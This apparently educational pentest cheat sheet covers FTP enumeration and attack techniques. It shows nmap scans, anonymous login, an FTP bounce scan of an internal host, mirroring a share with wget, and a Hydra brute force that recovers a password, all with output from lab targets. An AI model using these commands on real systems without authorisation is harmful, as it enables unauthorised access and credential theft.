Views: 52
By default, FTP service uses TCP port 21. However, it’s possible to modify the default port and run the ftp service using another TCP port.
Basic FTP Commands
| Command | Description |
|---|---|
| ?/help | print local help information |
| append | Append to a file |
| ascii | set ascii transfer type |
| binary | Set Binary transfer type |
| bye/exit/quit | Terminate ftp session and exit |
| cd | Change remote working directory |
| chmod | Change file permissions of remote file |
| close/disconnect | Terminate FTP session |
| debug | toggle/set debugging mode |
| delete/mdelete (multiple) | delete remote file |
| dir/ls | list contents of remote directory |
| get/recv/mget (multiple) | receive file |
| mkdir | make directory on remote machine |
| passive | enter passive transfer mode |
| put/mput (multiple) | send one file |
| pwd | print working directory on remote machine |
| rename | rename file |
| rmdir | remove directory on remote machine |
| size | show size of remote file |
| type | set file transfer type |
| verbose | toggle verbose mode |
Vulnerable FTP Settings
There are many different security-related settings we can make on each FTP server. The below settings allows anonymous login to the FTP server.
| Setting | Description |
|---|---|
anonymous_enable=YES | Allowing anonymous login? |
anon_upload_enable=YES | Allowing anonymous to upload files? |
anon_mkdir_write_enable=YES | Allowing anonymous to create new directories? |
no_anon_password=YES | Do not ask anonymous for password? |
anon_root=/home/username/ftp | Directory for anonymous. |
write_enable=YES | Allow the usage of FTP commands: STOR, DELE, RNFR, RNTO, MKD, RMD, APPE, and SITE? |
Enumeration
Nmap – FTP Scripts
In KALI Linux, all the NSE scripts are located in the folder /usr/share/nmap/scripts/.
Finding nmap scripts,
#Update nmap scripts
C:\home\zybersec> sudo nmap --script-updatedb
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-27 13:29 CEST
NSE: Updating rule database.
NSE: Script Database updated successfully.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.77 seconds
#find nmap scripts for ftp service
C:\home\zybersec> find / -type f -name ftp* 2>/dev/null | grep scripts
/usr/share/nmap/scripts/ftp-syst.nse
/usr/share/nmap/scripts/ftp-brute.nse
/usr/share/nmap/scripts/ftp-bounce.nse
/usr/share/nmap/scripts/ftp-proftpd-backdoor.nse
/usr/share/nmap/scripts/ftp-anon.nse
/usr/share/nmap/scripts/ftp-vuln-cve2010-4221.nse
/usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse
/usr/share/nmap/scripts/ftp-libopie.nse Nmap default scripts -sC includes the ftp-anon Nmap script which checks if a FTP server allows anonymous logins. The version enumeration flag -sV provides interesting information about FTP services, such as the FTP banner, which often includes the version name.
# nmap enumeration
C:\home\zybersec> sudo nmap -sC -sV -p 21 192.168.152.133
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-27 12:57 CEST
Nmap scan report for 192.168.152.133
Host is up (0.00049s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.152.130
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
MAC Address: 00:0C:29:76:48:04 (VMware)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.09 secondssudo nmap -sC -sV -A -T4 -p 21 10.129.103.157
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-27 12:39 BST
Nmap scan report for 10.129.103.157
Host is up (0.0027s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 InFreight FTP v1.1
| Invalid command: try being more creative
|_ Invalid command: try being more creative
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 ftpuser ftpuser 39 Nov 8 2021 flag.txt
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.93%I=7%D=4/27%Time=644A5EF7%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,74,"220\x20InFreight\x20FTP\x20v1\.1\r\n500\x20Invalid\x20comm
SF:and:\x20try\x20being\x20more\x20creative\r\n500\x20Invalid\x20command:\
SF:x20try\x20being\x20more\x20creative\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 2.60 ms 10.10.14.1
2 2.56 ms 10.129.103.157
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.99 secondsAnonymous Login
One of these authentication mechanisms is the anonymous user. This is often used to allow everyone on the internal network to share files and data without accessing each other’s computers.
From the nmap scan, it seems that the anonymous login is accepted by the target FTP server. To access with anonymous login, we can use the anonymous username and no password.
# anonymous login
└──╼ $ftp 10.129.103.157
Connected to 10.129.103.157.
220 InFreight FTP v1.1
Name (10.129.103.157:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 ftpuser ftpuser 39 Nov 8 2021 flag.txt
226 Transfer complete
ftp> FTP login using Openssl
It looks slightly different if the FTP server runs with TLS/SSL encryption. Because then we need a client that can handle TLS/SSL. For this, we can use the client openssl and communicate with the FTP server. The good thing about using openssl is that we can see the SSL certificate, which can also be helpful.
# FTP server runs with TLS/SSL encryption
openssl s_client -connect 192.168.152.133:21 -starttls ftp
CONNECTED(00000003)
Can't use SSL_get_servername
depth=0 C = BEUS, ST = California, L = Sacramento, O = nlabs, OU = Dev, CN = master.nlabs.local, emailAddress = [email protected]
verify error:num=18:self signed certificate
verify return:1
depth=0 C = US, ST = California, L = Sacramento, O = nlabs, OU = Dev, CN = master.nlabs.local, emailAddress = [email protected]
verify return:1
---
Certificate chain
0 s:C = US, ST = California, L = Sacramento, O = nlabs, OU = Dev, CN = master.nlabs.local, emailAddress = [email protected]
i:C = US, ST = California, L = Sacramento, O = nlabs, OU = Dev, CN = master.nlabs.local, emailAddress = [email protected]
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIENTCCAx2gAwIBAgIUD+SlFZAWzX5yLs2q3ZcfdsRQqMYwDQYJKoZIhvcNAQEL
...SNIP...Service Interaction
# Interacting with FTP service
C:\home\zybersec> nc -nv 192.168.152.133 21
(UNKNOWN) [192.168.152.133] 21 (ftp) open
220 (vsFTPd 2.3.4)
C:\home\zybersec> telnet 192.168.152.133 21
Trying 192.168.152.133...
Connected to 192.168.152.133.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
# Enumerate FTP
cat /etc/vsftpd.conf | grep -v "#"
cat /etc/ftpusers
ftp> status
ls
cd
ls -R
ftp> get path\to\file.txt
ls | grep files.txt
wget -m --no-passive ftp://anonymous:[email protected] #download all available files
touch testupload.txt #upload a file
put testupload.txt #upload a fileFTP Bounce Attacks
An FTP bounce attack is a network attack that uses FTP servers to deliver outbound traffic to another device on the network. The attacker uses a PORT command to trick the FTP connection into running commands and getting information from a device other than the intended server.
Consider we are targetting an FTP Server FTP_DMZ exposed to the internet. Another device within the same network, Internal_DMZ, is not exposed to the internet. We can use the connection to the FTP_DMZ server to scan Internal_DMZ using the FTP Bounce attack and obtain information about the server’s open ports. Then, we can use that information as part of our attack against the infrastructure.
Modern FTP servers include protections that, by default, prevent this type of attack, but if these features are misconfigured in modern-day FTP servers, the server can become vulnerable to an FTP Bounce attack.
# FTP Bounce attack
nmap -Pn -v -n -p80 -b anonymous:[email protected] 172.17.0.2
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-27 04:55 EDT
Resolved FTP bounce attack proxy to 10.10.110.213 (10.10.110.213).
Attempting connection to ftp://anonymous:[email protected]:21
Connected:220 (vsFTPd 3.0.3)
Login credentials accepted by FTP server!
Initiating Bounce Scan at 04:55
FTP command misalignment detected ... correcting.
Completed Bounce Scan at 04:55, 0.54s elapsed (1 total ports)
Nmap scan report for 172.17.0.2
Host is up.
PORT STATE SERVICE
80/tcp open http
<SNIP>Brute Force FTP
# HYDRA brute-force attack
hydra -f -l robin -P passwords.txt 10.129.1.122 ftp -s 2121
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-28 10:28:00
[DATA] max 16 tasks per 1 server, overall 16 tasks, 250 login tries (l:1/p:250), ~16 tries per task
[DATA] attacking ftp://10.129.1.122:2121/
[2121][ftp] host: 10.129.1.122 login: robin password: 7ixxxxxxxxxxx
[STATUS] attack finished for 10.129.1.122 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-28 10:28:47